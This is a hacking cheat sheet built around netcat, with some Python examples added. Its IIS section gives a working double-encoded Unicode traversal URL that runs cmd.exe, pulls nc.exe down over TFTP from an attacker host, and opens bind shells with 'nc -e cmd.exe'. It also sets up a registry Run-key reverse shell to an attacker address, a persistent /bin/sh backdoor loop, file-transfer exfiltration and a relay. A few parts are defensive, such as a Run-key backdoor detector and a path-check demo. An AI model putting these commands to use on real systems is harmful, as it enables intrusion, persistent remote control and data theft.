Port scanning 1 through 200:
nc -v -w2 -z 192.168.0.2 1-200
(-z connects without sending any data, -w2 gives up on each port after 2 seconds, -v reports which ports answered.)
-------------------------------
Banner grabbing with nc:
nc -v -n 192.168.0.2 80
(-n skips DNS. Services like SMTP or FTP talk first; a web server says nothing until you type a request such as GET / HTTP/1.0 and press Enter twice.)
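What the two nc commands above do on the wire, as an added Python example (not code from the original page): a TCP connect scan with a per-port timeout, which is exactly the probe nc -z -w2 sends, followed by a banner grab. The throwaway listener that answers with a constructed SMTP-style banner stands in for a real service so the script runs offline; the banner text, loopback host and port choices are assumptions made for the example.

```python
import socket
import socketserver
import threading
from typing import Callable, Iterable, List, Tuple


def scan_ports(host: str, ports: Iterable[int], timeout: float = 2.0) -> List[int]:
    """TCP connect scan, what `nc -z -w2 host 1-200` does: a full handshake per
    port, no payload, giving up after `timeout` seconds. Refused, filtered and
    unreachable all look the same to a connect scan: not open."""
    open_ports = []
    for port in ports:
        try:
            with socket.create_connection((host, port), timeout=timeout):
                open_ports.append(port)
        except OSError:
            pass
    return open_ports


def grab_banner(host: str, port: int, timeout: float = 2.0, probe: bytes = b"") -> bytes:
    """Connect and read what the service volunteers, like `nc -v -n host 80`.
    SMTP/FTP/SSH speak first; HTTP stays silent until it gets a request, so pass
    something like b"HEAD / HTTP/1.0\\r\\n\\r\\n" as `probe` for web servers."""
    chunks = []
    with socket.create_connection((host, port), timeout=timeout) as s:
        if probe:
            s.sendall(probe)
        try:
            while True:
                data = s.recv(4096)
                if not data:          # peer closed: banner complete
                    break
                chunks.append(data)
        except socket.timeout:
            pass                      # peer kept the socket open; return what we got
    return b"".join(chunks)


class _BannerHandler(socketserver.BaseRequestHandler):
    """Constructed stand-in for a real service: send a banner, then hang up."""
    def handle(self):
        try:
            self.request.sendall(self.server.banner)
        except OSError:
            pass                      # a -z style probe disconnects before reading


def start_banner_server(banner: bytes) -> Tuple[int, Callable[[], None]]:
    """Listen on an ephemeral loopback port; returns (port, stop_function)."""
    srv = socketserver.ThreadingTCPServer(("127.0.0.1", 0), _BannerHandler)
    srv.daemon_threads = True
    srv.banner = banner               # assumed attribute read by the handler above
    threading.Thread(target=srv.serve_forever, daemon=True).start()

    def stop():
        srv.shutdown()
        srv.server_close()
    return srv.server_address[1], stop


def unused_port() -> int:
    """Bind to port 0 and release it: a loopback port that is (almost certainly) closed."""
    with socket.socket() as s:
        s.bind(("127.0.0.1", 0))
        return s.getsockname()[1]


if __name__ == "__main__":
    port, stop = start_banner_server(b"220 mail.example.test ESMTP ready\r\n")
    closed = unused_port()
    print("open:", scan_ports("127.0.0.1", [closed, port], timeout=1.0))
    print("banner:", grab_banner("127.0.0.1", port, timeout=1.0))
    stop()
```

Against a real target, replace the loopback address and feed scan_ports a range(1, 201) to mirror the command line; grab_banner with a probe is the equivalent of typing the request by hand after nc connects.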
------------------------------
IIS Unicode File Traversal:
http://192.168.0.2/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\
(%255c is a double-encoded backslash: IIS decodes it to %5c, runs its path check, then decodes again to \, so ..%255c.. becomes ..\.. and walks out of the scripts directory.)
Now we want to upload nc.exe to the vulnerable IIS server:
http://192.168.0.2/scripts/..%255c../winnt/system32/cmd.exe?/c+TFTP+-i+192.168.1.9+GET+nc.exe
We used:
tftp -i 192.168.1.9 GET nc.exe
(-i selects binary transfer mode; 192.168.1.9 is our TFTP server) which is transformed into:
http://<exploit URL>/c+TFTP+-i+192.168.1.9+GET+nc.exe
by replacing each space with a +. As a TFTP server we can use TFTPD32 by Ph. Jounin.
---------------------------------
Netcat as a backdoor:
Now we have nc.exe on the server and we want to create a backdoor that gives us a remote shell.
nc -L -p 1001 -d -e cmd.exe
-L -> "listen harder": keep listening and accept a new connection after the previous one closes.
-p -> port to listen on.
-d -> detach from the console, so it runs without a window.
-e -> the program to hand the connection to once a client connects (cmd.exe).
(-e only exists in nc builds compiled with GAPING_SECURITY_HOLE, which the usual Windows nc.exe is; OpenBSD netcat does not have it, and ncat uses -e/--exec.)
If we now convert this command for Unicode URL use, it looks like this:
http://<exploit URL>/c+nc+-L+-p+1001+-d+-e+cmd.exe
ex:
nc -v 192.168.80.14 80
GET http://192.168.80.14/scripts/..%255c../winnt/system32/cmd.exe?/c+nc.exe+-L+-p+1001+-d+-e+cmd.exe
(Type the GET line and press Enter; then connect to the shell with nc -v 192.168.80.14 1001.)
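The URL construction used in the last two sections and the reason %255c gets past a path check, as an added Python example (not part of the original page): build_exploit_url does the space-to-+ conversion described above, check_once models a filter that percent-decodes the path one time before looking for traversal, which is the shape of the IIS flaw, and check_fully decodes to a fixed point first. The host, the segment-walking filter and its internals are illustrative assumptions, not IIS code.

```python
import re
from urllib.parse import unquote

# The double-encoded traversal used throughout this page: %25 -> '%', then %5c -> '\'.
TRAVERSAL = "/scripts/..%255c../winnt/system32/cmd.exe"


def build_exploit_url(host: str, command: str) -> str:
    """cmd.exe command line -> page-style URL: '?/c+' prefix and spaces as '+'."""
    return "http://%s%s?/c+%s" % (host, TRAVERSAL, command.replace(" ", "+"))


def decode_n(path: str, n: int) -> str:
    """Apply percent-decoding n times (the server decoded twice, the check ran after once)."""
    for _ in range(n):
        path = unquote(path)
    return path


def decode_fully(path: str, limit: int = 8) -> str:
    """Decode until nothing changes: canonicalise first, check second."""
    for _ in range(limit):
        decoded = unquote(path)
        if decoded == path:
            return path
        path = decoded
    raise ValueError("too many encoding layers: %r" % path)


def escapes_webroot(decoded_path: str) -> bool:
    """Walk the segments (either separator) and see whether '..' ever climbs above the root."""
    depth = 0
    for segment in re.split(r"[\\/]", decoded_path):
        if segment == "..":
            depth -= 1
            if depth < 0:
                return True
        elif segment and segment != ".":
            depth += 1
    return False


def check_once(raw_path: str) -> bool:
    """Vulnerable shape: decode once, then check. '..%5c..' is just an odd directory name here."""
    return escapes_webroot(decode_n(raw_path, 1))


def check_fully(raw_path: str) -> bool:
    """Hardened: decode to a fixed point, then check; '..\\..' is now visible."""
    return escapes_webroot(decode_fully(raw_path))


if __name__ == "__main__":
    print(build_exploit_url("192.168.0.2", "tftp -i 192.168.1.9 GET nc.exe"))
    for n in (0, 1, 2):
        print(n, decode_n(TRAVERSAL, n))
    print("filter decoding once blocks it:", check_once(TRAVERSAL))
    print("filter decoding fully blocks it:", check_fully(TRAVERSAL))
```

The two check functions differ only in when decoding stops; that ordering, not the backslash itself, is what the %255c trick exploits.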
------------------------------------------------------
Transferring files with nc.exe:
We want to transfer a file called hack.txt to the IIS server and we don't want to use TFTP. We can use nc.exe to transfer the file.
To receive a file named hack.txt on the destination system, first start Netcat on the IIS server with the following command:
nc -l -p 1234 > hack.txt
On our source system (the attacking computer) we send the file hack.txt to the IIS machine with the following command:
nc [destination ip] 1234 < hack.txt
Now we can see that the file has been transferred to the target system, via port 1234. The listener exits when the sender closes the connection; nothing checks integrity, so compare file sizes or hashes on both ends.
#################
Server side: nc -L -p [PORT] -e cmd.exe
Client side: nc -vv [IP] [PORT]
On the victim computer:
reg add hklm\software\microsoft\windows\currentversion\run /v capture /t reg_sz /d "nc 192.168.1.68 10001 -d -e cmd.exe"
Remember 192.168.1.68 is the attacker machine.
And on the attacker machine just listen:
nc -vv -l -p 10001
You should be listening on your machine, and when a user logs on after the victim reboots (the Run key fires at logon), nc will connect to you and spawn a reverse shell.
The command prompt popup should come up for a second and disappear.
You should put nc in the system32 directory, so you don't have to specify where nc is located. All you have to do then is type nc in any directory.
-l waits for a connection.
-p port to listen on.
-d detach from the console.
-e which program to execute.
-w timeout for connection.
-v verbose [use twice to be more verbose]
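A check for the Run-key persistence the reg add line above creates, as an added Python example (not part of the original page): it parses reg query style output and flags autostart values that launch netcat, bind a listener, hand the connection to a program with -e, or dial a hard-coded address and port. The sample output is constructed for the example (two benign entries next to the netcat autostarts from this page), and the rules are this example's own heuristics, not a Windows feature.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample of `reg query HKLM\...\Run` output for the example.
SAMPLE_REG_QUERY = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    SecurityHealth    REG_EXPAND_SZ    %windir%\system32\SecurityHealthSystray.exe
    capture           REG_SZ           nc 192.168.1.68 10001 -d -e cmd.exe
    OneDrive          REG_SZ           "C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
    capture2          REG_SZ           c:\tmp\nc.exe -l -p 6666
"""

NETCAT_NAMES = {"nc", "nc.exe", "nc64.exe", "ncat", "ncat.exe", "netcat", "netcat.exe"}


def parse_reg_query(text: str) -> List[Dict[str, str]]:
    """Value lines are indented and separated by runs of spaces: name, type, data."""
    entries = []
    for line in text.splitlines():
        if not line.startswith("    "):
            continue
        parts = re.split(r"\s{2,}", line.strip(), maxsplit=2)
        if len(parts) == 3:
            entries.append({"name": parts[0], "type": parts[1], "data": parts[2]})
    return entries


def executable_name(command: str) -> str:
    """Basename of the first token, honouring a quoted path."""
    command = command.strip()
    if command.startswith('"'):
        end = command.find('"', 1)
        first = command[1:end] if end > 0 else command[1:]
    else:
        first = command.split()[0] if command else ""
    return first.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def suspicious_reasons(command: str) -> List[str]:
    """Why an autostart command looks like a netcat backdoor; empty list means clean."""
    reasons = []
    if executable_name(command) in NETCAT_NAMES:
        reasons.append("launches netcat")
    if re.search(r"(^|\s)-e\s+\S", command):
        reasons.append("executes a program on connect (-e)")
    if re.search(r"(^|\s)-[lL](\s|$)", command):
        reasons.append("binds a listening port (-l/-L)")
    if re.search(r"(^|\s)\d{1,3}(?:\.\d{1,3}){3}\s+\d{1,5}(\s|$)", command):
        reasons.append("connects to a hard-coded ip and port")
    return reasons


def audit_run_key(text: str) -> List[Tuple[str, str, List[str]]]:
    """(value name, command, reasons) for every Run-key entry that trips a rule."""
    findings = []
    for entry in parse_reg_query(text):
        reasons = suspicious_reasons(entry["data"])
        if reasons:
            findings.append((entry["name"], entry["data"], reasons))
    return findings


if __name__ == "__main__":
    for name, command, reasons in audit_run_key(SAMPLE_REG_QUERY):
        print("%-10s %s\n           %s" % (name, command, "; ".join(reasons)))
```

Renaming nc.exe defeats the name rule, which is why the flag and address rules are there; on a real host, feed it the output of reg query for both the HKLM and HKCU Run and RunOnce keys.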
###############
Netcat fun tricks:
Data Transfer (Pull):
server: nc -l -p [port] < [filename]
client: nc [server ip] [server port] > [filename]
Data Transfer (Push):
server: nc -l -p [port] > [filename]
client: nc [server ip] [server port] < [filename]
Backdoors:
unix: nc -l -p [port] -e /bin/sh
windows: nc -l -p [port] -e cmd.exe
Persistent Backdoor:
while [ 1 ]; do nc -l -p [port] -e /bin/sh; done
Reverse Shell:
server (attacker): nc -l -p [port]
client (victim): nc [server ip] [server port] -e [shell]
Backdoor Client:
nc [server ip] [port]
Traffic Relay on Linux:
mknod backpipe p
nc -l -p [incoming port] 0<backpipe | nc [target ip] [target port] | tee backpipe
(The named pipe carries the replies back: the second nc's output goes through tee into backpipe, which the first nc reads as its stdin.)
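The backpipe relay above, as an added Python example (not code from the original page): the FIFO plus tee gives the second nc a return path, and this script does the same with one copy loop per direction for each connection, half-closing each side so the EOF propagates. The echo service it relays to is constructed for the example, and the loopback addresses, ports and timeouts are assumptions.

```python
import socket
import socketserver
import threading
from typing import Callable, Tuple


def _pump(src: socket.socket, dst: socket.socket) -> None:
    """Copy bytes one way until src hits EOF, then half-close dst so the far end
    sees that EOF too (the FIFO in the shell version carries the reply direction)."""
    try:
        while True:
            data = src.recv(65536)
            if not data:
                break
            dst.sendall(data)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


class _RelayHandler(socketserver.BaseRequestHandler):
    """Per incoming connection: dial the real target, then pump both directions."""
    def handle(self):
        upstream = socket.create_connection(self.server.target, timeout=10)
        self.request.settimeout(10)
        with upstream:
            back = threading.Thread(target=_pump, args=(upstream, self.request), daemon=True)
            back.start()                    # target -> client
            _pump(self.request, upstream)   # client -> target
            back.join()


class _EchoHandler(socketserver.BaseRequestHandler):
    """Constructed stand-in for the destination service: echo until the peer half-closes."""
    def handle(self):
        while True:
            data = self.request.recv(65536)
            if not data:
                break
            self.request.sendall(data)


def _serve(handler, **attrs) -> Tuple[int, Callable[[], None]]:
    """Start a threaded loopback server on an ephemeral port; returns (port, stop)."""
    srv = socketserver.ThreadingTCPServer(("127.0.0.1", 0), handler)
    srv.daemon_threads = True
    for key, value in attrs.items():
        setattr(srv, key, value)            # e.g. target, read by _RelayHandler
    threading.Thread(target=srv.serve_forever, daemon=True).start()

    def stop():
        srv.shutdown()
        srv.server_close()
    return srv.server_address[1], stop


def start_echo_server() -> Tuple[int, Callable[[], None]]:
    return _serve(_EchoHandler)


def start_relay(target: Tuple[str, int]) -> Tuple[int, Callable[[], None]]:
    """Equivalent of: nc -l -p [incoming port] 0<backpipe | nc [target] | tee backpipe"""
    return _serve(_RelayHandler, target=target)


def send_through(port: int, payload: bytes) -> bytes:
    """Act as the client: send, half-close, and collect everything that comes back."""
    chunks = []
    with socket.create_connection(("127.0.0.1", port), timeout=10) as s:
        s.sendall(payload)
        s.shutdown(socket.SHUT_WR)
        while True:
            data = s.recv(65536)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks)


if __name__ == "__main__":
    echo_port, stop_echo = start_echo_server()
    relay_port, stop_relay = start_relay(("127.0.0.1", echo_port))
    print(send_through(relay_port, b"GET / HTTP/1.0\r\n\r\n"))
    stop_relay()
    stop_echo()
```

Unlike the shell one-liner, which serves a single connection and then exits, this relay accepts connection after connection, which is the behaviour you get from the Windows -L flag or the while loop in the Persistent Backdoor entry.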
Traffic Replay:
nc [targetip] [port] < [filename]
Windows autostart variant: a plain listener on port 6666 started at logon (add -e cmd.exe to make it a shell):
reg add hklm\software\microsoft\windows\currentversion\run /v capture /t reg_sz /d "c:\tmp\nc.exe -l -p 6666"
##############